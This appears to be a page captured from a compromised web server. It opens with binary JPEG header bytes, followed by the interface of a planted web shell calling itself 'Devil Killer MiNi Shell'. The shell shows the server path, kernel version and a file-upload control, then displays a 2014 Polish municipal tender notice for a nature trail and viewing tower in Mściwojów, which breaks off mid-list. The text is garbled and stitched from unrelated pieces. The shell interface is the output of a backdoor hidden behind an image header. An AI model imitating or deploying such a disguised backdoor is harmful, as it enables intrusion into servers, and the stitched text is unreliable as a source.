JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140415/82931-N-2014.html

<p class="kh_header"><b>Mściwojów: Budowa ścieżki przyrodniczej w dolinie rzeki Wierzbiak wraz z punktem widokowym na Przedgórze Sudeckie</b><br>
<b>Numer ogłoszenia: 82931 - 2014; data zamieszczenia: 15.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mściwojów , Mściwojów 43, 59-407 Mściwojów, woj. dolnośląskie, tel. 076 8728522 w. 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msciwojow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ścieżki przyrodniczej w dolinie rzeki Wierzbiak wraz z punktem widokowym na Przedgórze Sudeckie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych w formule zaprojektuj i wybuduj, zadania inwestycyjnego pod nazwą: Budowa ścieżki przyrodniczej w dolinie rzeki Wierzbiak wraz z punktem widokowym na Przedgórze Sudeckie polegające na wykonaniu kompletnej dokumentacji projektowej tj. koncepcji, projektu budowlanego i wykonawczego, STWiORB, kosztorysów inwestorskich, przedmiarów robót wraz z uzyskaniem decyzji o pozwoleniu na budowę, a następnie wykonanie robót budowlanych wraz z uzyskaniem pozwolenia na użytkowanie  zakres, który obejmuje wykonanie: 1) ścieżka o nawierzchni utwardzonej - długość 1850m, średniej szerokość 1,5m - dz. nr 373, 556, 374, 377, 385, 415, 522 - materiał parametry: zgodnie z zaleceniami konserwatora w granicach działek wpisanych do rejestru zabytków należy wykonać nawierzchnię mineralną, jako obrzeża ścieżek należy zastosować obrzeża z taśm stalowych lub tworzywa na pozostałych działkach należy wykonać nawierzchnię z kostki brukowa granitowej 8x10 w pierwszej klasie. Wykonanie koniecznych robót ziemnych z zastosowaniem rozwiązań technicznych zapewniających wymaganą nośność i stateczność budowli oraz konstrukcji nawierzchni,  podbudowa mechaniczne stabilizowana, nawierzchnia zróżnicowana względem rozmiaru i koloru, 2) parking oraz wjazd o nawierzchni utwardzonej - 8 miejsc - powierzchnia - 142 m2 - dz. nr 556 - materiał parametry: kostka granitowa 8x10, wykonanie koniecznych robót ziemnych z zastosowaniem rozwiązań technicznych zapewniających wymaganą nośność i stateczność budowli oraz konstrukcji nawierzchni, podbudowa mechaniczne stabilizowana,  uporządkowanie terenu przyległego, 3) renowacja stawu - powierzchnia w rzucie - 586 m2- dz. nr 556 - oczyszczenie linii brzegowej stawu w celu poprawy walorów widokowych - 100 m2 (pas szerokości 1m), wykonanie mechanicznego odmulania stawu - wymiar w rzucie - 586 m2, odtworzenie brzegów - mur z kamienia polnego  - 92 mb, wraz z zastawką - 1szt., studnią fi 100 - 1szt. oraz rurociągiem wylotowym o długości 15 m, odtworzenie murków okalających wjazd - 12 mb do stawu wraz z renowacją wjazdu - 25 m2, przywrócenie stanu pierwotnego zgodnie zaleceniami konserwatorskimi a także przeprowadzenie przy udziale specjalisty herpetologa lustrację terenową mającą na celu stwierdzenie ewentualnych siedlisk płazów, 4) latarnie parkowe wysokie - 19 szt. - dz. nr 373, 556, 374, 377, 385, 415 - materiał parametry: latarnia stylizowana, lampion - aluminium, korpus z żeliwa i stali, wysokość 350cm, przygotowanie terenu, montaż, podłączenie elektryczne oraz zabezpieczenia prądowe zgodnie z normami, podłączenie do najbliższego punktu zasilania - długość kabla zasilającego wg wskazań Zamawiającego, możliwość sterowania latarniami w zakresie trybów oświetleniowych, 5) latarnie hybrydowe wysokie - 8 szt. - dz. nr 522 - materiał parametry:  słup - ocynk, wysokość 8 m, słup wzmocniony, żarówki LED, oprawy - odporne na uszkodzenia mechaniczne, autonomia - od 6 do 8 dni, czujnik zmierzchowy, zabezpieczenie przed kradzieżą, przygotowanie terenu, montaż, podłączenie oraz zabezpieczenia prądowe zgodnie z normami, 6) infokiosk z dostępem do internetu - 1 szt. - dz. nr 373 - materiał parametry: obudowa jednobryłowa stalowa, malowana proszkowo, ekran zabezpieczony przed wandalizmem, jednostka centralna i oprogramowanie, interfejsy komunikacyjne, elektryka z zabezpieczeniem różnicowo-prądowym, montaż na trwale z podłożem, przygotowanie terenu, montaż, podłączenie elektryczne oraz zabezpieczenia prądowe zgodnie z normami, podłączenie do najbliższego punktu zasilania - długość kabla zasilającego nie więcej niż 40 m, uruchomienie i konfiguracja wg wskazań Zamawiającego, 7) mała architektura w obrębie strefy objętej ochrona konserwatorską - ławki - 13 szt. - dz. nr 373, 556, 374, 377, 385 - materiał parametry: ławka żeliwna - ławka o stylizowanej formie, siedzisko drewniane impregnowane, montaż na trwale do podłoża, 8) mała architektura w  obrębie strefy objętej ochrona konserwatorską - kosze na odpadki - 13 szt. - dz. nr 373, 556, 374, 377, 385 - materiał, parametry: konstrukcja stalowo-żeliwna, montaż na trwale do podłoża, 9) mała architektura w obrębie strefy objętej ochrona konserwatorską - tablice informacyjno-edukacyjne - 3 szt. - dz. nr 373, 556, 374 - materiał, parametry: podstawy żeliwne, plansza - płyta OSB, nadruk w technologii zapewniającej trwałość w zróżnicowanych warunkach atmosferycznych, 10) mała architektura w obrębie strefy objętej ochrona konserwatorską - słupek kierunkowy żeliwny - 5 szt. - dz. nr 373, 374, 377, 385 - materiał, parametry: konstrukcja stalowo-żeliwna, montaż na trwale do podłoża, tabliczki z nadrukami, 11) mała architektura na pozostałych terenach - ławki drewniane - 16 szt. - dz. nr 415, 522 - materiał, parametry: wysokiej jakości drewno sosnowe o powierzchni gładko struganej, łączenia trwałe, drewno impregnowane oraz lakierowane, montaż na trwale do podłoża, 12) mała architektura na pozostałych terenach - kosze na odpadki drewniane - 16 szt. - dz. nr 415, 522 - materiał/parametry: wysokiej jakości drewno sosnowe o powierzchni gładko struganej, łączenia trwałe, drewno impregnowane oraz lakierowane, montaż na trwale do podłoża, 13) mała architektura na pozostałych terenach - tablice informacyjno-edukacyjne drewniane - 4 szt. - dz. nr 415, 522 - materiał parametry: wysokiej jakości drewno sosnowe o powierzchni gładko struganej, łączenia trwałe, drewno impregnowane oraz lakierowane, montaż na trwale do podłoża, 14) mała architektura na pozostałych terenach - słupek kierunkowy drewniany - 5 szt. - dz. nr 415, 522 - materiał parametry: wysokiej jakości drewno sosnowe o powierzchni gładko struganej, drewno impregnowane oraz lakierowane, montaż na trwale do podłoża, tabliczki z nadrukami, 15) mała architektura na pozostałych terenach - stojaki rowerowe - 5 szt. - dz. nr 415, 522 - materiał parametry: wysokiej jakości drewno sosnowe o powierzchni gładko struganej, drewno impregnowane oraz lakierowane, montaż na trwale do podłoża, 16) nasadzenia zieleni - drzewa 29 szt., krzewy formowane - 10m2, roślinność okrywowa - 16m2 - dz. nr 374, 377 - materiał parametry: nasadzenia drzew liściastych z bryłą korzeniową, nasadzenia krzewów i roślinności okrywowej z poprawnie wykształconym systemem korzeniowym, równomiernie rozkrzewione, przygotowanie i wykończenie nawierzchni pod nasadzeniami, system stabilizacji nowych nasadzeń, napowietrzanie stref korzeniowych, ekrany przeciw korzeniowe, 17) wieża widokowa o konstrukcji stalowej - 1 szt., wys. 23 m, wymiary w rzucie - 750cm x 750cm, dz. nr 522, a) wieża: konstrukcja mieszana - stalowo-drewniana (drewno - klasa min. C27 np. modrzewiowe strugane, wkręty do drewna nierdzewne kl. A2), wykonanie koniecznych robót ziemnych z zastosowaniem rozwiązań technicznych zapewniających wymaganą nośność i stateczność budowli, wieża  V-kondygnacyjna, taras widokowy wyposażony w tablicę informacyjno-edukacyjną pochyłą - 1 szt. oraz lunetę obserwacyjną (bez mechanizmu wrzutowego), dach kopertowy w układzie kratowym o nachyleniu ok. 25stopni z poszyciem drewnianym pokryty gontem bitumicznym, b) instalacja odgromowa:  wieża musi być wyposażona w instalację odgromową zgodnie z Polską Normą w tym zakresie. W swoim projekcie i Specyfikacji Technicznej Wykonawca przedstawi rozwiązania dotyczące instalacji odgromowej dla wieży, wraz z uziemieniem, 18) ogrodzenie terenu wieży - 80 mb, dz. nr 522 - materiał/parametry: ogrodzenie panelowe wokół terenu wieży, montaż z elementów umożliwiających szybki montaż na podmurówce betonowej prefabrykowanej, kolor - spójny z kolorystyką powłoki lakierniczej wieży do akceptacji Zamawiającego, 19) system monitoringu  - 1 kpl - dz. nr 556, 374, 385, 415, 522 - materiał parametry: zainstalowanie 6 kamer wraz z osprzętem umożliwiającym ich prawidłowe działanie, w tym: dostawa, montaż i konfiguracja: 6 kamer zasilanie elektryczne, przesył obrazu i sterowanie światłowodem, 20) budowa wiat edukacyjnych - 2 szt., dz. nr 373, 522 - materiał parametry: wiaty edukacyjne 2 sztuki, na planie kwadratu, konstrukcja z drewna o profilu kwadratowym, klejonym czterowarstwowo poddanemu impregnacji głęboko ciśnieniowej w kolorze uzgodnionym z Zamawiającym, pokrycie dachu - gontem bitumicznym w kolorze uzgodnionym z Zamawiającym,  wyposażenie wiat - dwie ławki drewniane przymocowane na stałe do podłoża, wiaty zgodne z załączonymi zdjęciami poniżej lub równoważne, 21) dostawa i montaż fragmentów skał - 1 kpl, dz. nr 415 - materiał parametry: fragmenty skał (tj. bazalt, piaskowiec, łupek szarogłazowy, granit, wapień), związane z budową geologiczną terenów objętych ochroną w postaci dużych elementów skalnych, do każdego elementu skalnego należy przewidzieć tabliczkę z opisem każdej próbki skalnej, 22) dostawa i montaż figur rzeźb drewnianych - 6 szt., dz. nr 374 - materiał parametry: rzeźby drewniane prezentujące wybrane gatunki zwierząt i ptaków objętych ochroną (np. żuraw, kumak nizinny, salamandra itp.),   23) dostawa i montaż lunet obserwacyjnych  - 2 szt. - dz. nr 522 - materiał parametry: lunety obserwacyjne (bez mechanizmu wrzutowego), korpus z metalu, do zastosowania na zewnątrz, 1 szt. montaż na podeście widokowym wieży, 1 szt. montaż w terenie. Proponowane rozwiązania, sposób kształtowania i ich cechy konstrukcyjne mogą ulec modyfikacji wynikającej z wydanych przez właściwe służby i organy administracji państwowej - na etapie projektu budowlanego - wytycznymi projektowymi i warunkami technicznym, a wszelkie zmiany muszą uzyskać akceptację Zamawiającego. 2. Szczegółowy opis przedmiotu zamówienia zawarty został w SIWZ oraz w załącznikach, w szczególności w: 1) Projekt umowy - załącznik nr 7 do SIWZ, 2) Program funkcjonalno-użytkowy - załącznik nr 8 do SIWZ, 3) Specyfikacja robót i wyposażenia - załącznik nr 9 do SIWZ, 4) Wypis i wyrys z MPZP dla miejscowości Mściwojów nr IP 6727.1.2013 z dnia 14.01.2013 r. i nr IP 6727.2.2013 z dnia 14.01.2013 r., 5) Opinii Konserwatora Zabytków w Legnicy z dnia 10.04.2014 r., 6) Opinii Regionalnej Dyrekcji Ochrony Środowiska we Wrocławiu z dnia 10.01.2013 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.20.00.00-0, 71.30.00.00-1, 71.40.00.00-2, 71.41.00.00-5, 71.42.00.00-8, 71.50.00.00-3, 45.11.00.00-1, 45.11.20.00-5, 45.11.27.00-2, 45.11.27.10-5, 45.11.27.11-2, 45.11.27.12-9, 45.23.32.00-1, 45.23.32.60-9, 45.11.12.00-0, 45.24.00.00-1, 43.32.50.00-7, 45.23.14.00-9, 45.31.61.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 20.000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnia nie warunku poprzez złożenie oświadczenia (wzór załącznik nr 2)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, iż: 
a) zrealizował w okresie  ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej:  1 robotę budowlaną polegającą na budowie wieży o konstrukcji drewniano-stalowej lub drewniano-stalowo-żelbetowej o wysokości minimum 20 metrów, o wartości nie mniejszej niż 300 000,00 PLN brutto (trzysta  tysięcy złotych) oraz b) zrealizował w okresie  ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej:  1 robotę budowlane o wartości co najmniej 250 000,00 PLN brutto (dwieście pięćdziesiąt tysięcy złotych) lub w ilości min. 2.500,00 m2, odpowiadające swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia polegające na budowie i/lub przebudowie  i/lub remoncie dróg lub chodników lub placów z kostki kamiennej lub betonowej,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże dysponowanie: a) wykwalifikowanym personelem inżynieryjno-technicznym, posiadającym uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno-budowlanej, pozwalające na kierowanie robotami objętymi przedmiotem zamówienia celem pełnienia funkcji Kierownika Budowy, wskazany Kierownik Budowy musi posiadać doświadczenie w zakresie pełnienia funkcji kierownika budowy co najmniej 5 lat (licząc od daty uzyskania uprawnień) oraz b) wykwalifikowanym personelem inżynieryjno-technicznym, posiadającym uprawnienia budowlane bez ograniczeń celem pełnienia funkcji Głównego Projektanta w specjalności architektonicznej bez ograniczeń i minimum pięcioletnie (licząc od daty uzyskania uprawnień) doświadczenie zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że posiada  ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę minimum 1.000 000,00 PLN (słownie: jeden milion złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty  -  zgodny ze wzorem podanym w załączniku nr 1 do SIWZ,
2) Kserokopia wniesienia wadium, 
3) W sytuacji, gdy wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, zobowiązany jest udowodnić, iż będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia wykonawcy, ubiegającego się o zamówienie odpowiedniego zasobu oraz wskazać:
a) jaki jest zakres dostępnych wykonawcy zasobów innego podmiotu,
b) w jaki sposób zostaną wykorzystane zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c) jakiego charakteru stosunki będą łączyły wykonawcę z innym podmiotem,
d) jaki jest zakres i w jakim okresie udziału inny podmiot będzie brał udział przy wykonywaniu zamówienia
4) Jeżeli wykonawca, wskazując spełnianie warunków udziału, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26  ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów oświadczenia o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków o których mowa w art. 24 ust. 1 ustawy,  którego wzór stanowi załącznik nr 5.
5) Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentowania wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo określające zakres umocowania podpisane prze osoby uprawnione do reprezentowania wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków ich wprowadzenia:
1) Zmiana terminu realizacji zamówienia spowodowana w przypadku:
a) warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych zgodnie z dokumentacją projektową i STWiORB, w szczególności gwałtowne opady deszczu (oberwanie chmury), gradobicie, burze z wyładowaniami atmosferycznymi i inne klęski żywiołowe np. powodzie, obfite opady śniegu; 
b) okoliczności leżących po stronie Zamawiającego, w szczególności konieczność usunięcia istotnych błędów lub wprowadzenia istotnych zmian w materiałach przekazanych Wykonawcy - nie ujawnionych przed wszczęciem postępowania o udzielenie zamówienia publicznego;
c) prowadzenia wykopalisk archeologicznych w związku, ze znaleziskami w trakcie prowadzenia robót;
d) odkrycia na terenie budowy broni, bomb, niewybuchów lub innych materiałów wybuchowych oraz przedmiotów o znaczeniu archeologicznym i historycznym,
e) jeżeli zmianie ulegną terminy realizacji zadania uwzględnione w dokumentacji aplikacyjnej i w umowie o dofinansowanie (w tym wydłużenie terminu realizacji zadania) - termin zakończenia może zostać zmieniony o czas wynikający z uzyskanej przez Zamawiającego zgody na zmianę terminu,
f) jeżeli Wykonawca złoży wniosek o zmianę terminu wykonania umowy, a zmiana jest korzystna dla Zamawiającego - termin realizacji może zostać zmieniony w sposób uzgodniony pomiędzy stronami,
g) jeżeli wystąpią znacząco odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategoria gruntu, kurzawka itp.), warunki terenowe w szczególności  podziemne urządzenia lub niezinwentaryzowane obiekty budowlane itp., uniemożliwiające terminowe wykonanie przedmiotu umowy - termin realizacji może zostać przesunięty o czas niezbędny do wykonania prac wynikających z nowych warunków, 
h) wykrycia instalacji, urządzeń lub budowli podziemnych nie ujętych w dokumentacji projektowej i nie zinwentaryzowanych przez właścicieli i gestorów instalacji i urządzeń, a wymagających przebudowy w związku z wykonaniem przedmiotu umowy,
